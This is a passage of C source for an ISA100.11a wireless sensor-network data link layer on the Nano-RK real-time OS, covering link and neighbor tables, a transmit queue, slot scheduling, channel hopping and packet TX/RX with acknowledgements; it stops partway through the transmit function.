ISA_QUEUE isaQueue[TRANSMIT_QUEUE_MAX_SIZE] ;
//ISA_QUEUE *isaQueuePointer[TRANSMIT_QUEUE_MAX_SIZE]
uint8_t isa_sched[ISA_SLOTS_PER_FRAME];
uint64_t isa_tdma_rx_mask; //should not need this
uint64_t isa_tdma_tx_mask; // should not need this
uint64_t isa_slot; //Set to 1 if slot is in use
uint8_t isaTxQueueSize; //holds the number of elements present in the Queue
//********************Local function definitions***********************************
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource);
void dlmoInit();
int8_t addLink (uint8_t slotNumber, DLMO_NEIGHBOR* neighborIndex,LinkType linkType);
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry));
void sendPacket(uint16_t destAddr, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry)) ;
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry));
void isaFreePacket(ISA_QUEUE *entry);
void dlmoInit()
{
uint8_t i;
//for LINK
for (i=0; i<DLMO_LINK_MAX_COUNT; i++)
{
(dlmoLink[i].isPresent = false);
}
//for NEIGHBOR
for(i=0; i<DLMO_NEIGHBOR_MAX_COUNT; i++)
{
dlmoNeighbor[i].isPresent = false;
}
//Initialization for Transmit Queue
isaTxQueueSize = 0; //Explicitly initialize this to 0
/*
for(i=0; i<TRANSMIT_QUEUE_MAX_SIZE; i++)
{
isaQueuePointer[i] = &isaQueue[i];
}
*/
}
int8_t addLink(uint8_t slotNumber, DLMO_NEIGHBOR* neighborIndex,LinkType linkType)
{
uint8_t index;
//find if there exists a free link
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (dlmoLink[index].isPresent == false) break;
}
if (index == DLMO_LINK_MAX_COUNT)
{
setIsaError(LINK_CAPACITY_ERROR);
return -1;
}
//we have found a free index
dlmoLink[index].isPresent = true;
dlmoLink[index].neighbor = neighborIndex;
dlmoLink[index].linkType = linkType;
dlmoLink[index].chOffset = slotNumber;
// channel offset implementation will change as the protocol develops
return 0;
}
DLMO_LINK * findLink(uint8_t slot){
uint8_t index;
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (dlmoLink[index].isPresent == true && dlmoLink[index].chOffset == slot ) {
return &dlmoLink[index];
}
}
printf ("This slot is not configured yet: %d\n\r" , slot);
return NULL;
}
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2,bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate)
{
uint8_t i,free_index=0;
bool free_index_present = false;
for(int i=0;i<DLMO_NEIGHBOR_MAX_COUNT;i++)
{
if(index == dlmoNeighbor[i].index)
{
printf("Neighbor Exists in Table at %d\n",index);
return &dlmoNeighbor[free_index];
}
if(dlmoNeighbor[i].isPresent == false)
{
free_index_present = true;
free_index = i;
}
}
if(free_index_present == false)
{
setIsaError(NEIGHBOR_CAPACITY_ERROR);
return NULL;
}
else
{
dlmoNeighbor[free_index].index = index;
dlmoNeighbor[free_index].isPresent = true;
dlmoNeighbor[free_index].EUI64 = EUI64;
dlmoNeighbor[free_index].groupCode1 = groupCode1;
dlmoNeighbor[free_index].groupCode2 = groupCode2;
if(clockSource == true) dlmoNeighbor[free_index].typeInfo = ISASET(dlmoNeighbor[free_index].typeInfo,CLOCK_PREFERRED);
dlmoNeighbor[free_index].linkBacklogIndex = linkBacklogIndex;
dlmoNeighbor[free_index].linkBacklogDur = linkBacklogDur;
dlmoNeighbor[free_index].linkBacklogActivate = linkBacklogActivate;
return &dlmoNeighbor[free_index];
}
}
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource)
{
DLMO_NEIGHBOR* neighborIndex; //store the neighbor index to pass to addLink()
if (slotNumber >= ISA_MAX_SLOTS) {
printf ("Slot number not in range");
return;
}
//Call the function to add a neighbor
neighborIndex = addNeighbor(neighborId,0, 0, 0, clockSource,0,0, 0);
if (neighborIndex == NULL)//
{
printIsaError();
return;
}
if (addLink(slotNumber, neighborIndex, linkType) == -1)
{
printIsaError();
return;
}
//record that the slot is in use- used to calculate next wakeup
isa_slot |= ((uint64_t) 1) << slotNumber;
}
/**
* isa_get_slots_until_next_wakeup()
*
* This function returns the absolute number of slots between the current_slot
* and the next RX/TX related wakeup.
*
* Argument: current_slot is the current slot
* Return: uint16_t number of slots until the next wakeup
*/
uint16_t isa_get_slots_until_next_wakeup (uint16_t current_global_slot)
{
uint16_t min_slot;
uint8_t test_slot;
uint8_t wrapped_slot;
uint8_t current_local_slot;
uint64_t testVariable = 0;
current_local_slot = current_global_slot%25;
testVariable |= ((uint64_t) 1) << (current_local_slot+1);
for (test_slot = current_local_slot+1; test_slot < ISA_SLOTS_PER_FRAME; test_slot++) {
if(isa_slot & testVariable) { //slot is scheduled
min_slot = test_slot-current_local_slot;
return min_slot;
}
testVariable = testVariable << 1;
}
// scheduled slot wrapped back
testVariable = 1;
for (test_slot = 0; test_slot<=current_local_slot;test_slot++){
if(isa_slot & testVariable){ //slot is scheduled
min_slot = (ISA_SLOTS_PER_FRAME - current_local_slot + test_slot);
return min_slot;
}
testVariable = testVariable << 1;
}
}
// *** Data link layer service access points ****
/*
* SrcAddr (NL source address)
* DestAddr (NL destination address)
* Priority (priority of the payload)
* DE (discard eligible)
* ECN (explicit congestion notification)
* LH (last hop, NL)
* ContractID (ContractID of the payload)
* DSDULength (payload length)
* DSDU (number of octets as per DSDULength)
* DSDUHandle (uniquely identifies each invocation of this primitive)
*
*/
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry))
{
//Future - Lookup DestAddr and add into the Queue with for a particular next hop
//Configure the headers within the payload (whichever applicable)
return enQueue (destAddr, priority, length, payload, slot_callback);
}
//Wrapper for dd_data_request
void sendPacket(uint16_t destAddr, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry)){
if (dd_data_request(0, destAddr, 0, 0, 0, 0, 0, length, payload, slot_callback) == -1){
printIsaError();
}
}
//****************************************Functions for Queue***********************************************
/*
* NOTE : We are using a layer of pointers so that we can easily reorder elements in the queue without having to copy entire entries
* We are only swapping the pointers. Basically using a layer of indirection
* Operation of addition into the queue is as follows
* Iterate through the queue to find a free slot to insert
* Make sure we don't pass any lower priority valid entries
* If we dont and find a free entry, we insert into this entry and then fix from here onwards
* Fix means swapping if the next valid entry is of higher priority, thus finding the right place in the queue for the new entry
*
* If we do pass a lower priority entry without being able to find a place to insert then
* Record the place where we crossed this entry
* Run till we can find a place to insert and insert
* Fix in the backward direction till the recorded index
*/
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry))
{
uint8_t i;
/*
bool passedLowerPriority = false;
bool fixRequired = false;
bool insertionDone = false;
uint8_t lowerPriorityIndex;
uint8_t usedIndex;
ISA_QUEUE * temp;
*/
if (isaTxQueueSize > TRANSMIT_QUEUE_MAX_SIZE){
setIsaError(TRANSMIT_QUEUE_CAPACITY_ERROR);
return -1;
}
//check if length of payload is within bounds
if (length >= RF_MAX_PAYLOAD_SIZE) {
setIsaError(MAX_PAYLOAD_ERROR);
return -1;
}
//if we are here, we should have place to add into the Queue
//find the first free index and insert
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == false){
isaQueue[i].length = length;
isaQueue[i].priority = priority;
isaQueue[i].transmitPending = true;
isaQueue[i].usedSlot = true;
isaQueue[i].neighbor = neighbor;
isaQueue[i].slot_callback = slot_callback;
memcpy(isaQueue[i].tx_buf, payload, length );//copy the payload
nrk_time_get(&isaQueue[i].time); //copy the time when I was inserted into Queue
isaTxQueueSize++;
break;
}
}
if ( i == TRANSMIT_QUEUE_MAX_SIZE){
printf(" Critical error 2");
return -1;
}
return 1;
//this if evaluates the event in which I have not copied into a slot and find an entry of lower priority
/*
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && insertionDone == false && passedLowerPriority == false && isaQueuePointer[i]->priority < priority && isaQueuePointer[i]->neighbor == neighbor){
passedLowerPriority = true;
lowerPriorityIndex = i;
continue;
}
//if passedLowerPriority == true , then find a slot to insert and insert-> swap pointers for lowerPriority and free
//fix for every index till free index
if (insertionDone == false && isaQueuePointer[i]->usedSlot == false){
//find a free slot to insert
usedIndex = i;
isaQueuePointer[i]->length = length;
isaQueuePointer[i]->priority = priority;
isaQueuePointer[i]->transmitPending = true;
isaQueuePointer[i]->usedSlot = true;
isaQueuePointer[i]->neighbor = neighbor;
memcpy(isaQueuePointer[i]->tx_buf, payload, length );//copy the payload
isaTxQueueSize++;
insertionDone = true;
if (passedLowerPriority == true) break; //IF this is the case, I fix after this loop
continue;
}
if (insertionDone == true && isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority > isaQueuePointer[usedIndex]->priority ){ //Swap
//we come here only if fix required
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
//we can return now if we did not come here through the condition where I inserted after a higher priority
if (passedLowerPriority == false) return 1;
//I am here if I inserted after lower priority. Now I need to take care of fixing that
// I iterate from usedIndex to lowerPriority Index in the backward direction and fix
for (i = usedIndex -1 ; i >= lowerPriorityIndex ; i--)
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority < isaQueuePointer[usedIndex]->priority){
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
return 1;
*/
}
ISA_QUEUE * getHighPriorityEntry(uint16_t neighbor){
nrk_time_t time;
uint8_t priority = 0;
ISA_QUEUE* tempIndex;
bool found = false;
uint8_t i;
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == true && isaQueue[i].transmitPending == true && isaQueue[i].neighbor == neighbor){
if (found == false){
found = true;
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
// if the priority is greater or ( priority is the same and ( seconds is less or nanosecs is less))
if (found == true && ( priority < isaQueue[i].priority || ( (priority == isaQueue[i].priority) && ( time.secs > isaQueue[i].time.secs || (time.secs == isaQueue[i].time.secs && time.nano_secs > isaQueue[i].time.nano_secs ))))){
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
}
}
if (found == false) {
return NULL;
}
return tempIndex;
}
//*********************************************************************************************************
isaFreePacket(ISA_QUEUE *entry){
entry->usedSlot = false;
isaTxQueueSize--;
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/src/net/isa/isa.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
#include <isa_scheduler.h>
#include <isa.h>
#include <isa_defs.h>
#define CHANNEL_HOPPING
//#define CORRECTION
//#define INIT_SYNC
#define LED_SLOT_DEBUG
//#define HIGH_TIMER_DEBUG
#define TX_RX_DEBUG
#define ACK_DEBUG
#define RX_DEBUG
#define TX_DEBUG
//#define JOIN_PROCESS
#ifdef JOIN_PROCESS
uint8_t join_pkt_buf[RF_MAX_PAYLOAD_SIZE];
#endif
/* slot related declaration */
volatile uint16_t global_slot;
volatile uint16_t current_global_slot;
volatile uint16_t global_cycle;
uint16_t last_sync_slot;
/* channel hopping related declaration */
uint8_t slottedPattern[16];
uint8_t slowPattern[3];
uint8_t currentChannel;
uint8_t channelIndex;
uint8_t slowIndex;
/*used for calculating offset*/
uint16_t slot_start_time;
uint16_t tx_start_time; // actual transmission starting time
uint16_t rx_start_time;
uint16_t offsetY;
uint16_t offsetX;
/* SYNC related declaration */
uint8_t _isa_sync_ok;
uint8_t AFTER_FIRST_SYNC;
uint16_t EXPIRATION = 200;// each slot lasts for 10ms, so 100 slots last for 1s
uint16_t slot_expired;
uint8_t previous_tx_slot;
/* signal related declaration */
int8_t isa_tx_done_signal;
int8_t isa_rx_pkt_signal;
/* header type */
uint8_t DHDR; // Data link layer header sub-header, currently used as ACK control
//uint8_t DMXHR[4]; //Data link layer media access control extension sub header, mainly used for security control
uint8_t DAUX[29]; //Data link layer auxiliary sub-header, currently used for join process
//uint8_t DROUT[3]; //Routing sub-header, compressed variant
//uint8_t DADDR[5]; //Addressing sub-header
uint8_t DHR; // ACK's data link layer header
/* Test variable */
uint8_t tmp_curSec;
uint8_t tmp_offsetSec;
int16_t tmp_offsetNanoSec;
uint16_t tmp_count=0;
void config_child_list (uint8_t node_id)
{
child_list |= ((uint32_t) 1) << node_id;
}
/**
* isa_set_channel()
*
* This function set channel and is used for channel hopping.
*
*/
void isa_set_channel (uint8_t chan)
{
isa_param.channel = chan;
rf_set_channel (chan);
}
uint8_t isa_get_channel()
{
return isa_param.channel;
}
void isa_set_channel_pattern(uint8_t pattern)
{
switch (pattern)
{
case 1:
slottedPattern[0] = 19;
slottedPattern[1] = 12;
slottedPattern[2] = 20;
slottedPattern[3] = 24;
slottedPattern[4] = 16;
slottedPattern[5] = 23;
slottedPattern[6] = 18;
slottedPattern[7] = 25;
slottedPattern[8] = 14;
slottedPattern[9] = 21;
slottedPattern[10] = 11;
slottedPattern[11] = 15;
slottedPattern[12] = 22;
slottedPattern[13] = 17;
slottedPattern[14] = 13;
slottedPattern[15] = 26;
break;
case 3:
slowPattern[0]=15;
slowPattern[1]=20;
slowPattern[2]=25;
break;
default:
break;
}
}
int8_t isa_ready()
{
if (_isa_ready == 1)
return NRK_OK;
else
return NRK_ERROR;
}
int8_t isa_rx_pkt_set_buffer(uint8_t *buf, uint8_t size)
{
if(size==0 || buf==NULL) return NRK_ERROR;
isa_rfRxInfo.pPayload = buf;
isa_rfRxInfo.max_length = size;
return NRK_OK;
}
int8_t isa_wait_until_rx_pkt()
{
nrk_signal_register(isa_rx_pkt_signal);
if (isa_rx_pkt_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(isa_rx_pkt_signal));
return NRK_OK;
}
int8_t isa_wait_until_rx_or_tx ()
{
nrk_signal_register(isa_rx_pkt_signal);
nrk_signal_register(isa_tx_done_signal);
nrk_event_wait (SIG(isa_rx_pkt_signal) | SIG(isa_tx_done_signal));
return NRK_OK;
}
/**
* isa_init()
*
* This function sets up the low level link layer parameters.
* This starts the main timer routine that will then automatically
* trigger whenever a packet might be sent or received.
* This should be called before ANY scheduling information is set
* since it will clear some default values.
*
*/
uint8_t isa_init (isa_node_mode_t mode, uint8_t id, uint8_t src_id)
{
uint8_t i;
/* Generate signals */
isa_rx_pkt_signal=nrk_signal_create();
if(isa_rx_pkt_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating rx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
isa_tx_done_signal=nrk_signal_create();
if(isa_tx_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating tx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
// No buffer to start with
isa_rfRxInfo.pPayload = NULL;
isa_rfRxInfo.max_length = 0;
/*FIXME Actually we dont need to always run the high speed timer */
_nrk_high_speed_timer_start();
/* clear everything out */
global_cycle = 0;
global_slot = MAX_ISA_GLOBAL_SLOTS;
_isa_sync_ok = 0;
_isa_join_ok = 0;
slot_expired = 0;
isa_node_mode = mode;
isa_id = id;//change
isa_clk_src_id=src_id; //change
isa_rx_data_ready = 0;
isa_tx_data_ready = 0;
isa_param.mobile_sync_timeout = 100;
isa_param.rx_timeout = 8000; // 8000 *.125us = 1ms
isa_param.tx_guard_time = TX_GUARD_TIME;
isa_param.channel = 15;
isa_param.mac_addr = 0x1981;
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
isa_tdma_rx_mask = 0;
isa_tdma_tx_mask = 0;
/* Setup the cc2420 chip */
rf_init (&isa_rfRxInfo, isa_param.channel, 0x2421, isa_param.mac_addr);
AFTER_FIRST_SYNC = 1;
/* Setup fisrt hopping channel */
#ifdef CHANNEL_HOPPING
slowIndex=0;
if(id!=0){
channelIndex = src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
#endif
#ifdef JOIN_PROCESS
if(mode==ISA_GATEWAY){
for(i=22;i<=24;i++){
isa_tx_info[i].pPayload = join_pkt_buf;
isa_tx_info[i].length = PKT_DATA_START+1; // pass le pointer
isa_tx_info[i].DHDR = configDHDR();
isa_tx_data_ready |= ((uint32_t) 1 << i); // set the flag
}
}
#endif
resync_times=0;
return NRK_OK;
}
void isa_start ()
{
//_isa_clear_sched_cache ();
_isa_ready = 2;
}
/**
* configDHDR()
*
* Gateway could config the DHDR by informing the nodes.
* DHDR contains control information that should be loaded
* into the PDU header.
*
*/
int8_t configDHDR()
{
int8_t DHDR = 1;
if(1){//request ACK
DHDR |= 1<<7;
}
if(1){//request signal quality in ACK
DHDR |= 1<<6;
}
if(1){//request EUI
DHDR |= 1<<5;
}
if(0){//include DAUX
DHDR |= 1<<4;
}
if(0){//include slow hopping offset
DHDR |= 1<<3;
}
if(isa_node_mode == ISA_RECIPIENT){//is clock recipient
DHDR |= 1<<2;
}
return DHDR;
}
/**
* configDHR()
*
* Gateway could config the DHR by informing the nodes.
* DHR contains control information that should be loaded
* into the ACK reply header.
*
*/
int8_t configDHR()
{
int8_t DHR = 3;
if(isa_node_mode != ISA_RECIPIENT){//include clock correction change
DHR |= 1<<7;
}
if(0){//including slow-hopping timeslot offset
DHR |= 1<<6;
}
if(0){//request EUI
DHR |= 1<<5;
}
if(0){//include DAUX
DHR |= 1<<4;
}
if(0){//include slow hopping offset
DHR |= 1<<3;
}
return DHR;
}
/**
* configAdvDAUX()
*
* Gateway could config the DAUX
* DAUX contains superframe and join information
*
*/
void configAdvDAUX(uint8_t chPattern, uint8_t chIndex, uint8_t sp_period, uint8_t tx_slot1, uint8_t tx_slot2, uint8_t tx_slot3, uint8_t tx_slot4, uint8_t rx_slot1, uint8_t rx_slot2, uint8_t rx_slot3, uint8_t rx_slot4)
{
/*ADVERTISEMENT SELECTION*/
DAUX[0]=0; // Advertisement selection, 0 indicates advertisement DAUX
/*TIME SYNCHRONIZATION*/
/* 1-6 bytes are reserved for time synchronization */
/*SUPERFRAME INFORMATION*/
DAUX[7]=10; // timeslot duration, currently not used.
DAUX[8]=0; // reserved for long timeslot duration
DAUX[9]=chPattern; // channel pattern selection
DAUX[10]=chIndex; // channel index selection
DAUX[11]=sp_period; // superframe period
DAUX[12]=0; // reserved for long period situation
/* 13 reserved for superframe cycle starting point
14 reserved of the length of slow hopping period
15 and 16 reserved for channel hopping channel map for spectrum management
*/
/*JOIN INFORMATION*/
/* 17 reserved for Join backoff and timeout
18 reserved for Indicates fields that are transmitted
*/
DAUX[19]=tx_slot1; //TX slot 1
DAUX[20]=tx_slot2; //TX slot 2
DAUX[21]=tx_slot3; //TX slot 3
DAUX[22]=tx_slot4; //TX slot 4
DAUX[23]=rx_slot1; //RX slot 1
DAUX[24]=rx_slot2; //RX slot 2
DAUX[25]=rx_slot3; //RX slot 3
DAUX[26]=rx_slot4; //RX slot 4
/*INTEGRETY CHECK*/
/* 27 and 28 are reserved for Integrety check*/
}
/**
* isa_check_rx_status()
*
* This function returns if there is a packet in the link layer
* rx buffer. Once a packet has been received, it should be quickly
* processed or moved and then rtl_release_rx_packet() should be called.
* rtl_release_rx_packet() then resets the value of rtl_check_rx_status()
*
* Returns: 1 if a new packet was received, 0 otherwise
*/
int8_t isa_rx_pkt_check()
{
return isa_rx_data_ready;
}
/**
* isa_rx_pkt_get()
*
* This function returns the rx buffer point. It should be called
* once a packet is received and must be followed by isa_release_rx_packet().
* isa_release_rx_packet() then resets the value of isa_check_rx_status().
*
* Returns: rx buffer point
*/
uint8_t* isa_rx_pkt_get (uint8_t *len, int8_t *rssi)
{
if(isa_rx_pkt_check()==0){
*len=0;
*rssi=0;
return NULL;
}
*len=isa_rfRxInfo.length;
*rssi=isa_rfRxInfo.rssi;
return isa_rfRxInfo.pPayload;
}
/**
* _isa_rx()
*
* This is the low level RX packet function. It will read in
* a packet and buffer it in the link layer's single RX buffer.
* This buffer can be checked with rtl_check_rx_status() and
* released with rtl_release_rx_packet(). If the buffer has not
* been released and a new packet arrives, the packet will be lost.
* This function is only called from the timer interrupt routine.
*
* Arguments: slot is the current slot that is actively in RX mode.
*/
void _isa_rx (uint8_t slot)
{
uint8_t n;
uint32_t node_mask;
volatile uint8_t timeout;
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
// Timing for waiting for sfd
timeout = _nrk_os_timer_get();
timeout+=4; // 4ms
n = 0;
//nrk_gpio_set(NRK_DEBUG_3);
while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
//spend too much time on waiting for a pkt's arrival
rf_rx_off ();
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
//printf("sfd times out.\n\r");
#endif
return;
}
}
//printf("%d\n\r",_nrk_high_speed_timer_get());
// sfd received, start receiving packet and record start time
rx_start_time = _nrk_high_speed_timer_get();
// Timing for waiting for finishing packet receiving
timeout = _nrk_os_timer_get();
timeout += 5; // 5ms
if (n != 0) {
n = 0;
// printf("Packet on its way\n\r");
while ((n = rf_polling_rx_packet (false,128)) == 0) {
//printf("%d\n\r",_nrk_os_timer_get());
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
// spend too much time on receiving pkt.
return; // huge timeout as fail safe
}
}
}
rf_rx_off ();
if (n == 1) {// successfully received packet
nrk_led_toggle(BLUE_LED);
putchar ('r');
isa_rx_data_ready = 1;
//potential problem: if repeater or recipient receives noise, the DHDR would be changed. And it is highly possible that the highest bit of DHDR would be set to 0
/* if(isa_node_mode != ISA_GATEWAY)
DHDR = isa_rfRxInfo.pPayload[DHDR_INDEX];
*/
#ifdef RX_DEBUG
// printf("Repeater slot = %d, local slot is %d.\n\r", isa_rfRxInfo.pPayload[SLOT_INDEX],global_slot);
#endif RX_DEBUG
nrk_event_signal(isa_rx_pkt_signal);
//_nrk_high_speed_timer_reset();
//nrk_high_speed_timer_wait(0,CPU_PROCESS_TIME);
//nrk_gpio_set(NRK_DEBUG_3);
node_mask = ((uint32_t) 1) << isa_rfRxInfo.pPayload[SRC_INDEX];
if( !(node_mask & child_list))
return; //FIXME change
// ACK required
if(DHDR & (1<<7)){
// Transmit ACK packet
DHR = configDHR();
isa_ack_buf[DHR_INDEX]= DHR;
#ifdef ACK_DEBUG
//printf("DHR is %d.\n\r",DHR);
#endif
isa_ack_tx.pPayload = isa_ack_buf;
if (DHDR & (1<<2)){ // recipient , only reply explicit ACK
//isa_ack_tx.length = PKT_DATA_START-1;
isa_ack_tx.length = 2;
}
else { //reply ACK with time offsetX
offsetX = rx_start_time - slot_start_time;
//printf("slot_start_time is %d,rx_start_time is %d.\n\r",slot_start_time,rx_start_time);
uint8_t temp1,temp2;
temp1 = (offsetX & 0xFF00)>>8;
isa_ack_buf[OFFSET_HIGH]=temp1;
temp2 = (offsetX & 0x00FF);
isa_ack_buf[OFFSET_LOW]=temp2;
#ifdef ACK_DEBUG
// printf("offsetX is %d\n\r", offsetX);
#endif
//isa_ack_tx.length = PKT_DATA_START + 1;
isa_ack_tx.length = 4;
}
rf_tx_tdma_packet (&isa_ack_tx,slot_start_time,isa_param.tx_guard_time,&tx_start_time);
}
//nrk_gpio_clr(NRK_DEBUG_3);
}
#ifdef LED_DEBUG
nrk_led_clr (1);
#endif
}
/**
* isa_release_rx_packet()
*
* This function releases the link layer's hold on the rx buffer.
* This must be called after a packet is received before a new
* packet can be buffered! This should ideally be done by the
* network layer.
*
*/
void isa_rx_pkt_release()
{
isa_rx_data_ready = 0;
}
/**
* rtl_tx_packet()
*
* This function associates a slot with a particular packet that needs
* to be sent.
*
* Arguments: RF_TX_INFO *tx is a pointer to a transmit structure, this structure
* must have a valid pPayload pointer to the real packet.
* uint8_t slot is the value of the tx slot (starting from 0)
*
* Return: currently always returns 1
*/
int8_t isa_tx_pkt (uint8_t *tx_buf, uint8_t len, uint8_t DHDR, uint8_t slot)
{
isa_tx_info[slot].pPayload = tx_buf;
isa_tx_info[slot].length = len; // pass le pointer
isa_tx_info[slot].DHDR = DHDR;
isa_tx_data_ready |= ((uint32_t) 1 << slot); // set the flag
return 1;
}
/**
* isa_tx_pkt_check()
*
* This function allows an upper layer to check if a TX packet
* has been sent. For instance, you would first send a packet
* and then you could sleep or do more work, and eventually check
* done = isa_tx_pkt_check(8);
* to see if the packet had been sent by the interrupt routine.
*
* Returns: 1 if the packet was sent, 0 otherwise
*/
int8_t isa_tx_pkt_check(uint8_t slot)
{
if ((isa_tx_data_ready & ((uint32_t) 1 << slot)) != 0)
return 1;
return 0;
}
/**
* _isa_tx()
*
* This function is the low level TX function.
* It is only called from the timer interrupt and fetches any
* packets that were set for a particular slot by rtl_tx_packet().
*
* Arguments: slot is the active slot set by the interrupt timer.
*/
void _isa_tx (uint8_t slot)
{
uint8_t n;
uint8_t i;
int8_t tmp;
volatile uint8_t timeout;
uint8_t offsetSec, curSec;
uint16_t offsetNanoSec;
int16_t time_correction;
uint8_t tmp_nrk_prev_timer_val;
// load header
isa_rfTxInfo.cca = true;
isa_rfTxInfo.pPayload=isa_tx_info[slot].pPayload;
#ifdef TX_DEBUG
//printf("TX Payload is: %s.\n\r", isa_rfTxInfo.pPayload);
#endif
isa_rfTxInfo.length=isa_tx_info[slot].length;
isa_rfTxInfo.pPayload[DHDR_INDEX] = isa_tx_info[slot].DHDR;
isa_rfTxInfo.pPayload[SLOT_INDEX] = (global_slot & 0xFF);
isa_rfTxInfo.pPayload[SRC_INDEX] = isa_id;//change
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
for(i=0;i<29;i++){
isa_rfTxInfo.pPayload[DAUX_INDEX+i]=DAUX[i];
//printf("DAUX[%d]=%d\r\n",i,isa_rfTxInfo.pPayload[DAUX_INDEX+i]);
}
}
#endif
// FIXME a small bug. should not happen and should be fixed in _isa_init_sync()
//if(AFTER_FIRST_SYNC == 1){
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,WAIT_TIME_BEFORE_TX);
//AFTER_FIRST_SYNC = 0;
//}
#ifdef TX_RX_DEBUG
//nrk_gpio_set(NRK_DEBUG_1);
//printf("T\r\n");
#endif
if(rf_tx_tdma_packet (&isa_rfTxInfo,slot_start_time,isa_param.tx_guard_time,&tx_start_time))
{
nrk_led_toggle(RED_LED);
putchar ('t');
//("rx_start_time is %d.\n\r",_nrk_high_speed_timer_get());
offsetY = tx_start_time - slot_start_time;
//printf("offset Y is %d.\n\r",offsetY);
#ifdef HIGH_TIMER_DEBUG
//printf("In isa.c _isa_tx(): offsetY is %d, tx_start_time is %d\n\r",offsetY,tx_start_time);
#endif
}
nrk_event_signal (isa_tx_done_signal);
isa_tx_data_ready &= ~((uint32_t) 1 << slot); // clear the flag
// ACK required
if(DHDR & (1<<7) && isa_node_mode!=ISA_GATEWAY){ //Azriel
rf_polling_rx_on ();
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,CPU_PROCESS_TIME);
//nrk_gpio_set(NRK_DEBUG_1);
// Timing for waiting for receiving ACK
timeout = _nrk_os_timer_get();
timeout+=2; // 2ms
n = 0;
